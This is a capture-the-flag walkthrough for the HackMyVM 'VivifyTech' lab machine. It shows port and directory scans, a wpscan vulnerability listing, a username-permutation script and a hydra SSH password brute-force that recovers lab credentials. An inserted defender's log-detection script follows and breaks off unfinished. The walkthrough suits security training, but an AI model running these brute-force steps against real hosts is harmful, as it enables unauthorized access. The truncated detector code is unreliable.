• VivifyTech - hackmyvm


    Overview

    Target name: VivifyTech

    Difficulty: easy

    Machine URL: https://hackmyvm.eu/machines/machine.php?vm=VivifyTech

    Local environment

    Hypervisor: VirtualBox

    Target IP (VivifyTech): 192.168.56.119

    Jump host IP (Windows 11): 192.168.56.1, 192.168.190.100

    Attack box IP (Kali): 192.168.190.131

    Scanning

    Starting with nmap

    nmap -sT -p0- 192.168.56.119 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
    nmap -sT -sV -sC -O -p$ports 192.168.56.119 -oA nmapscan/detail
    
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-16 09:31 EDT
    Nmap scan report for 192.168.56.119
    Host is up (0.00034s latency).
    
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
    | ssh-hostkey:
    |   256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
    |_  256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
    80/tcp    open  http    Apache httpd 2.4.57 ((Debian))
    |_http-title: Apache2 Debian Default Page: It works
    |_http-server-header: Apache/2.4.57 (Debian)
    3306/tcp  open  mysql   MySQL (unauthorized)
    33060/tcp open  mysqlx?
    | fingerprint-strings:
    |   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
    |     Invalid message"
    |     HY000
    |   LDAPBindReq:
    |     *Parse error unserializing protobuf message"
    |     HY000
    |   oracle-tns:
    |     Invalid message-frame."
    |_    HY000
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: WAP
    Running: Actiontec embedded, Linux
    OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel
    OS details: Actiontec MI424WR-GEN3I WAP
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 18.68 seconds
    

    The classic 22 and 80. MySQL is also exposed externally, and since the mysqlx extension port 33060 is open as well, the version must be at least 8.0.

    HTTP service

    What is this... there isn't even a site, just the Apache default page.

    A quick directory scan, and wow, it dumps everything right away.

    feroxbuster -u http://192.168.56.119/ -t 20 -w $HVV_Tool/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt  -C 500  -d 3
    
     ___  ___  __   __     __      __         __   ___
    |__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
    |    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
    by Ben "epi" Risher 🤓                 ver: 2.10.3
    ───────────────────────────┬──────────────────────
     🎯  Target Url            │ http://192.168.56.119/
     🚀  Threads               │ 20
     📖  Wordlist              │ /home/kali/1_Tool/1_HVV/8_dict/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt
     💢  Status Code Filters   │ [500]
     💥  Timeout (secs)        │ 7
     🦡  User-Agent            │ feroxbuster/2.10.3
     💉  Config File           │ /etc/feroxbuster/ferox-config.toml
     🔎  Extract Links         │ true
     🏁  HTTP methods          │ [GET]
     🔃  Recursion Depth       │ 3
     🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
    ───────────────────────────┴──────────────────────
     🏁  Press [ENTER] to use the Scan Management Menu™
    ──────────────────────────────────────────────────
    404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
    403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
    200      GET       24l      127w    10359c http://192.168.56.119/icons/openlogo-75.png
    301      GET        9l       28w      320c http://192.168.56.119/wordpress => http://192.168.56.119/wordpress/
    200      GET      368l      933w    10701c http://192.168.56.119/
    301      GET        9l       28w      332c http://192.168.56.119/wordpress/wp-includes => http://192.168.56.119/wordpress/wp-includes/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/widgets.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/l10n.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/plugin.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/fonts.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-taxonomy.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-role.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-walker.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-tax-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-error.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-hook.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-list-util.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed-controller.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template-utils.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-schema.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wpdb.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-streams.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-widgets.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/link-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/option.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-default-constants.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/general-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-paused-extensions-storage.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-duotone.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cache-compat.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-styles.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/shortcodes.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rss-functions.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-image-editor.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-request.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-classic-to-block-menu-converter.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpass.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-site.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/nav-menu.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-supports.php
    200      GET        1l        4w       29c http://192.168.56.119/wordpress/wp-includes/ms-files.php
    301      GET        9l       28w      331c http://192.168.56.119/wordpress/wp-content => http://192.168.56.119/wordpress/wp-content/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/error-protection.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-network.php
    200      GET       48l       48w      439c http://192.168.56.119/wordpress/wp-includes/secrets.txt
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term-query.php
    301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/uploads => http://192.168.56.119/wordpress/wp-content/uploads/
    301      GET        9l       28w      339c http://192.168.56.119/wordpress/wp-content/plugins => http://192.168.56.119/wordpress/wp-content/plugins/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-thumbnail-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable-deprecated.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/author-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-key-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/pluggable.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-frame.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/kses.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-link-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale-switcher.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-templates.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-load.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-requests.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-functions.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/bookmark-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-resolver.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-navigation-fallback.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-meta-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-manager.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-patterns-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/user.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/global-styles-and-settings.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget-factory.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-encoding.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/wp-db.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/load.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-customize-nav-menus.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-date-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/revision.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-editor-context.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/embed.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/taxonomy.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-pattern-categories-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-ajax-response.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rewrite.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-application-passwords.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/formatting.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-parser-block.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-curl.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/atomlib.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme-previews.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/sitemaps.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-comment-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-cookie.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/feed.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-matchesmapregex.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-post-type.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-locale.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/deprecated.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-metadata-lazyloader.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/blocks.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/comment-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/capabilities.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-editor.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/default-constants.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/http.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/compat.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependency.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/rest-api.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-widget.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-feed-cache-transient.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-object-cache.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-rewrite.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/theme.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json-data.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-proxy.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-detection.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/category-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-email-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/robots-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-roles.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-recovery-mode-cookie-service.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-dependencies.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-phpmailer.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-admin-bar.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/admin-bar.php
    200      GET       86l      145w     1151c http://192.168.56.119/wordpress/wp-includes/theme-i18n.json
    200      GET       17l       41w      316c http://192.168.56.119/wordpress/wp-includes/block-i18n.json
    200      GET      326l      708w     7303c http://192.168.56.119/wordpress/wp-includes/theme.json
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-textdomain-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-fatal-error-handler.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-list.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-user.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/functions.wp-scripts.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-network-query.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-embed.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/https-migration.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-pop3.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-session-tokens.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-type-registry.php
    301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-content/themes => http://192.168.56.119/wordpress/wp-content/themes/
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/canonical.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-theme-json.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/version.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/style-engine.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-block-styles-registry.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-term.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-http-response.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/media-template.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/block-editor.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/post-formats.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/ms-deprecated.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-site.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/cron.php
    200      GET        0l        0w        0c http://192.168.56.119/wordpress/wp-includes/class-wp-oembed.php
    301      GET        9l       28w      329c http://192.168.56.119/wordpress/wp-admin => http://192.168.56.119/wordpress/wp-admin/
    301      GET        9l       28w      334c http://192.168.56.119/wordpress/wp-admin/user => http://192.168.56.119/wordpress/wp-admin/user/
    301      GET        9l       28w      337c http://192.168.56.119/wordpress/wp-admin/network => http://192.168.56.119/wordpress/wp-admin/network/
    301      GET        9l       28w      333c http://192.168.56.119/wordpress/wp-admin/css => http://192.168.56.119/wordpress/wp-admin/css/
    301      GET        9l       28w      338c http://192.168.56.119/wordpress/wp-admin/includes => http://192.168.56.119/wordpress/wp-admin/includes/
    

    Now that we know it's WordPress, run wpscan against it.

    wpscan --url http://192.168.56.119/wordpress --api-token=VjtWw...
    
    _______________________________________________________________
             __          _______   _____
             \ \        / /  __ \ / ____|
              \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
               \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
                \  /\  /  | |     ____) | (__| (_| | | | |
                 \/  \/   |_|    |_____/ \___|\__,_|_| |_|
    
             WordPress Security Scanner by the WPScan Team
                             Version 3.8.25
           Sponsored by Automattic - https://automattic.com/
           @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
    _______________________________________________________________
    
    [+] URL: http://192.168.56.119/wordpress/ [192.168.56.119]
    [+] Started: Mon Jun 17 00:01:26 2024
    
    Interesting Finding(s):
    
    [+] Headers
     | Interesting Entry: Server: Apache/2.4.57 (Debian)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%
    
    [+] XML-RPC seems to be enabled: http://192.168.56.119/wordpress/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
    
    [+] WordPress readme found: http://192.168.56.119/wordpress/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] Upload directory has listing enabled: http://192.168.56.119/wordpress/wp-content/uploads/
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] The external WP-Cron seems to be enabled: http://192.168.56.119/wordpress/wp-cron.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 60%
     | References:
     |  - https://www.iplocation.net/defend-wordpress-from-ddos
     |  - https://github.com/wpscanteam/wpscan/issues/1299
    
    [+] WordPress version 6.4.1 identified (Insecure, released on 2023-11-09).
     | Found By: Rss Generator (Passive Detection)
     |  - http://192.168.56.119/wordpress/index.php/feed/, https://wordpress.org/?v=6.4.1
     |  - http://192.168.56.119/wordpress/index.php/comments/feed/, https://wordpress.org/?v=6.4.1
     |
     | [!] 4 vulnerabilities identified:
     |
     | [!] Title: WP 6.4-6.4.1 - POP Chain
     |     Fixed in: 6.4.2
     |     References:
     |      - https://wpscan.com/vulnerability/2afcb141-c93c-4244-bde4-bf5c9759e8a3
     |      - https://fenrisk.com/publications/blogpost/2023/11/22/gadgets-chain-in-wordpress/
     |
     | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
     |     Fixed in: 6.4.3
     |     References:
     |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
     |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
     |
     | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
     |     Fixed in: 6.4.3
     |     References:
     |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
     |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
     |
     | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
     |     Fixed in: 6.4.4
     |     References:
     |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
     |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
    
    [+] WordPress theme in use: twentytwentyfour
     | Location: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/
     | Last Updated: 2024-04-02T00:00:00.000Z
     | Readme: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/readme.txt
     | [!] The version is out of date, the latest version is 1.1
     | [!] Directory listing is enabled
     | Style URL: http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css
     | Style Name: Twenty Twenty-Four
     | Style URI: https://wordpress.org/themes/twentytwentyfour/
     | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
     | Author: the WordPress team
     | Author URI: https://wordpress.org
     |
     | Found By: Urls In Homepage (Passive Detection)
     |
     | Version: 1.0 (80% confidence)
     | Found By: Style (Passive Detection)
     |  - http://192.168.56.119/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
    
    [+] Enumerating All Plugins (via Passive Methods)
    
    [i] No plugins Found.
    
    [+] Enumerating Config Backups (via Passive and Aggressive Methods)
     Checking Config Backups - Time: 00:00:00 <==============> (137 / 137) 100.00% Time: 00:00:00
    
    [i] No Config Backups Found.
    
    [+] WPScan DB API OK
     | Plan: free
     | Requests Done (during the scan): 2
     | Requests Remaining: 23
    
    [+] Finished: Mon Jun 17 00:01:33 2024
    [+] Requests Done: 174
    [+] Cached Requests: 5
    [+] Data Sent: 48.24 KB
    [+] Data Received: 307.614 KB
    [+] Memory used: 256.867 MB
    [+] Elapsed time: 00:00:07
    
    

    Information gathering - brute force

    I then spent a long time hunting for a PoC against the theme and version, with no luck. Going back over the results, I noticed a secrets.txt.

    What can I say, hiding it in a directory like that is genuinely mischievous.

    Following the author's intent, the next step is to collect usernames. Besides the home page, there's the published post The story behind VivifyTech; combined, they give:

    sancelisso
    Sarah
    Mark
    Jake
    Alex
    

    Expand them with a username-permutation script

    from datetime import datetime
    import argparse
    
    def generate_additional_combinations(parts):
        print(parts)
        combinations = set()
        # If the name consists of a first and last name (two parts), generate specific formats
        if len(parts) == 2:
            # first name all lowercase + last name with lowercase initial
            combinations.add(parts[0].lower() + parts[1][0].lower() + parts[1][1:])
            combinations.add(parts[0].lower() + parts[1][0].lower())
            combinations.add(parts[0].upper() + parts[1][0].upper())
    
            combinations.add(parts[1].lower() + parts[0][0].lower())
            combinations.add(parts[1].upper() + parts[0][0].upper())
        print("combinations = > ",combinations)
        return combinations
    
    def generate_usernames(usernames):
        generated_usernames = set()
        for name in usernames:
            parts = name.split()  # split on whitespace
            if '.' in name:
                parts = name.split('.')  # split on dots
    
            # common username combinations
            generated_usernames.add(name.lower())  # all lowercase
            generated_usernames.add(name.upper())  # all uppercase
            generated_usernames.add(''.join(part[0] for part in parts).lower())  # lowercase initials
            generated_usernames.add('.'.join(parts).lower())  # dot-joined lowercase
    
            # special username combinations
            generated_usernames.update(generate_additional_combinations(parts))
    
        return sorted(generated_usernames)
    
    def read_usernames(filename):
        with open(filename, 'r') as file:
            return [line.strip() for line in file if line.strip()]
    
    def main():
        parser = argparse.ArgumentParser(description='Generate possible usernames.')
        parser.add_argument('-f', '--input-file', required=True, help='Input file containing a list of usernames.')
        parser.add_argument('-o', '--output-file', default='output.txt', help='Output file for possible usernames.')
    
        args = parser.parse_args()
    
        usernames = read_usernames(args.input_file)
        new_usernames = generate_usernames(usernames)
        with open(args.output_file, 'w') as file:
            for username in new_usernames:
                file.write(username + '\n')
    
        print(f"Username combinations have been written to {args.output_file}")
    
    if __name__ == "__main__":
        main()
    
    ALEX
    JAKE
    MARK
    SANCELISSO
    SARAH
    a
    alex
    j
    jake
    m
    mark
    s
    sancelisso
    sarah
    

    First I tried brute-forcing the WordPress admin login with Burp, with no success.

    Then I tried hydra against SSH, and it cracked the credentials: sarah/bohicon

    hydra -t 8 -L user.txt -P secrets.txt 192.168.56.119 ssh -I
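From the defender's side, a run like the hydra command above leaves a burst of "Failed password" lines from one source in sshd's auth log, usually followed by an "Accepted" once a guess lands. The detector below is an added example, not part of the original writeup; the log lines are constructed to mimic Debian sshd syslog output and the threshold/window values are assumptions.

```python
"""Flag SSH password-guessing bursts in sshd auth.log lines."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in Debian syslog format; not captured from the real target.
SAMPLE_LOG = """\
Jun 17 13:15:01 VivifyTech sshd[1201]: Failed password for invalid user alex from 192.168.190.131 port 41002 ssh2
Jun 17 13:15:01 VivifyTech sshd[1203]: Failed password for invalid user jake from 192.168.190.131 port 41004 ssh2
Jun 17 13:15:02 VivifyTech sshd[1205]: Failed password for sarah from 192.168.190.131 port 41006 ssh2
Jun 17 13:15:02 VivifyTech sshd[1207]: Failed password for sarah from 192.168.190.131 port 41008 ssh2
Jun 17 13:15:03 VivifyTech sshd[1209]: Failed password for sarah from 192.168.190.131 port 41010 ssh2
Jun 17 13:15:03 VivifyTech sshd[1211]: Failed password for sarah from 192.168.190.131 port 41012 ssh2
Jun 17 13:15:04 VivifyTech sshd[1213]: Accepted password for sarah from 192.168.190.131 port 41014 ssh2
Jun 17 13:40:10 VivifyTech sshd[1330]: Failed password for sarah from 192.168.56.1 port 50001 ssh2
Jun 17 14:02:55 VivifyTech sshd[1402]: Accepted publickey for sarah from 192.168.56.1 port 50020 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X".
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[0-9.]+) port \d+"
)


def parse_events(log_text):
    """Group sshd auth events by source IP as (timestamp, result, user) tuples."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog lines carry no year; strptime defaults to 1900, which is fine
        # for comparing timestamps within one log file.
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        events[m["ip"]].append((ts, m["result"], m["user"]))
    return events


def max_in_window(times, window_s):
    """Largest number of (sorted) timestamps inside any window_s-second span."""
    best = start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_s:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Report source IPs with >= threshold failed passwords inside window_s seconds."""
    findings = {}
    for ip, evs in parse_events(log_text).items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "Failed"]
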